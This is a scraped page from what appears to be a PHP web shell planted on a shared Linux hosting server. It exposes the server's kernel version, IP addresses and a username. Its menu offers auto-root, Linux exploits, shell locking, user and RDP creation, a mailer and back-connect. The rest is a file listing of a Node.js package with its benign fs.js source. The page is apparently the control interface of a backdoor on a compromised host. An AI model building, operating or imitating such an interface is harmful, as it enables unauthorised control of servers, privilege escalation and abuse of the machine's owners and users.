Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@nodelib /
fs.scandir /
out /
utils /
[ HOME SHELL ]
Name
Size
Permission
Action
fs.d.ts
159
B
-rw-r--r--
fs.d.ts.map
233
B
-rw-r--r--
fs.js
775
B
-rw-r--r--
fs.spec.d.ts
49
B
-rw-r--r--
fs.spec.d.ts.map
117
B
-rw-r--r--
fs.spec.js
844
B
-rw-r--r--
index.d.ts
80
B
-rw-r--r--
index.d.ts.map
178
B
-rw-r--r--
index.js
148
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fs.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.createDirentFromStats = void 0; class DirentFromStats { constructor(name, stats) { this.name = name; this.isBlockDevice = stats.isBlockDevice.bind(stats); this.isCharacterDevice = stats.isCharacterDevice.bind(stats); this.isDirectory = stats.isDirectory.bind(stats); this.isFIFO = stats.isFIFO.bind(stats); this.isFile = stats.isFile.bind(stats); this.isSocket = stats.isSocket.bind(stats); this.isSymbolicLink = stats.isSymbolicLink.bind(stats); } } function createDirentFromStats(name, stats) { return new DirentFromStats(name, stats); } exports.createDirentFromStats = createDirentFromStats;
Close